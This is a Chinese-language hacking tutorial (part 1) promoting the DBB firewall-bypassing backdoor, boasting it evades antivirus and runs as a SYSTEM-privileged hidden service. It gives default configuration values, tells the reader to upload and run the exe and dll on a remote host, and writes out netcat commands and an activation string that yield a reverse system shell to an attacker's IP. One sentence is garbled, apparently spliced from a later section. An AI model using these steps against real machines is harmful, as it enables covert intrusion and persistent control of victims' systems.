防火墙下的黑马-DBB后门程序(1)

　　今天要为大家介绍的DarkStorm BePassFireWall BackDoor V1.2是一款成功率极高的反弹端口穿透防火墙的后门程序（以下简称DBB），可以穿透99%的防火墙。该后门采用线程插入技术，隐蔽性极高，在系统中以服务形式加载，拥有system权限，一旦运行，很难将其删除。同时，最重要的是，现在还没有杀毒软件能够查杀它，可以说是现在理想的后门程序了。下面就让我们一起来领略一下DBB的独到魅力吧！

　　一、配置后门

　　第一步当然是把三、轻松操纵当回家，在使用后门前，请先用压缩包内的config DarkStorm.exe程序配置后门。双击运行config DarkStorm.exe，打开如图1所示的配置对话窗口，根据提示输入相关数据。其实，该后门支持不经过配置就可直接使用，这时将使用后门的默认配置：反向连接端口是8888，关键字是NOIR，服务名是DNScnsvc。

　　小提示：DBB后门服务端由DarkStorm.exe和DarkStorm.dll组成，这两个exe和DLL文件是可以改名的，但是必须要改成同样的名字，比如，可以把exe文件改名为123.exe，那么dll文件也要相应的改名为123.dll。

　　二、打开后门

　　要运行后门很简单，只要将exe和dll文件上传到远程主机上之后，直接运行exe文件，后门即可被加载。

　　小提示：exe文件和dll文件不必一定要放到system32中，但必须在同一文件夹下。

　　大家都知道，现在很多情况下主机是在防火墙后面的，如何让后门来逃避防火墙的火眼金睛呢？这就需要用反向连接功能。DBB是通过嗅探激活字符来启动反向连接的，仅支持nc反向连接。

　　首先在本地计算机中使用nc监听本地计算机的8888端口，进入命令行状态，运行如下命令： nc -l -p 8888。然后再用nc连接目标主机的任何一个防火墙允许的TCP端口（80/139/445.....），接着再开一个命令行窗口，运行命令：nc 220.202.242.101 139，然后输入激活命令：NOIR:220.202.242.98:8888。其中220.202.242.101为木马服务端IP地址，NOIR为反弹激活字，220.202.242.98：8888为反向连接的IP地址，也就是本机IP地址及端口。如果反向连接成功，就会在本地计算机中得到目标主机的一个系统权限SHELL（如图2）。